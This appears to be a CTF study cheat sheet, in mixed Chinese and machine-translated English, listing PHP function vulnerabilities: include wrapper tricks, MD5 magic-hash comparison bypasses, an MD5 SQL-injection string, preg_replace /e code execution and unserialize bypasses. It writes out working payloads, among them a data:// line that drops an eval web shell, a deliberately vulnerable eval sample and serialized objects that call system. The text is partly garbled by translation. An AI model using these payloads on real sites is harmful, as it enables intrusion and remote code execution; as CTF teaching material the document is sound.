Summary of php function vulnerabilities

做ctfDuring code audit,A variety of function vulnerabilities are often encountered,But they are scattered,I'll sort it out here,将会持续更新~

1.include
This function should do most of itctfer都很熟悉了,The file contains bugs,还有其他的比如require,include_once,require_once.The classic match is andphpPseudo-protocol is used together.

Common scenarios include：
（1）读取文件源码：php://filter/read=convert.base64-encode/resource=xxx.php
But read itbase64编码后的,解码一下就可以了.
（2）运行php代码：data://text/plain,<?php print_r(glob("*")); ?> 或者data:text/plain,<?php fputs(fopen("shell.php","w"),"<?php eval($_POST['h']);?>")?>

2.get_file_content
This function reads the file contents into a string,但是配合phpPseudo-protocols can implement a very weird operation,而且在ctfproblems are often encountered,That is to get whatever echo you want.

即get_file_content(‘data:text/plain,xxxxxxx’)的返回值就是xxxxxxx.

3.MD5比较

phpMedium equals are divided into weak equals== 和 强等于===.
（1）==绕过
==types are not compared,It will first convert two variables into variables of the same type and then compare them,So you can design it,For example, let both sides have it0e开头,This will be regarded as scientific notation0,can be equal
0e开头的md5和原值：
QNKCDZO
0e830400451993494058024219903391
240610708
0e462097431906509019562988736854
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904

Arrays can also be used to bypass,因为md5The array will be returnedfalse.

md5(‘0e215962017’) == ‘0e215962017’

若是没有md5加密,只有==,Then you can construct the string,比如'123admin'==123 为真.
（2）===绕过
This can be bypassed using the array above,Of course you canmd5碰撞.

（3）md5在sql注入时

ffifdyop经md5After encryption, the function of universal password can be realized,thought it was encrypted' or '6xxxxx

4.preg_replace
This is a regular replacement function,When the regular expression is providede模式时,That is, there is a code execution vulnerability,This vulnerability allows us to runphp函数.That is, if the second parameter of this function is controllable,即可执行任意代码.
Post a related topic,I skipped the previous steps,Find the source of an intermediate file.

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    
    echo complex($re, $str). "\n";
}

function getFlag(){
    
	@eval($_GET['cmd']);
}

Run according to the code when it is obviousgetFlag函数,然后通过cmd传参命令执行.如何运行getFlag函数呢,就要通过preg_replace函数了,However found in the codepreg_replaceThe second parameter of the function is fixed,But look at the data to find out,strtolower(“\1”)即为\1,而\1go submatch,所以可以构造payload：\S*=${phpinfo()}去执行函数,即\S*=${getFlag()} ,同时传入cmdparameters to execute the command.

5.unserialize
This function is the deserialization function,在ctfquestions are also common.It also has a lot of weirdnessbug.
（1）绕过wakeup函数
wakeupfunction is defined in the class,然后运行unserializeThere is a function that is automatically called when the function is called,Of course it can be bypassed,That is, if the serialized string is O:4:"Test":2:{s:1:"p";s:18:"find / -namelflag*""; s:4: "func";s:6: "system";}
只需要让TestThe latter value is larger than the original2即可绕过wakeup函数.
（2）绕过preg_match

if (preg match ( '/o : \d+:/i',$file) ) {
     
	die ( "hacking ! ! ! " );
}

If the serialized string is O:4:"Test":2:{s:1:"p";s:18:"find / -namelflag*""; s:4: "func";s:6: "system";}
只需在O后面的4前面加一个"+"号即可绕过preg_match.

…未完待续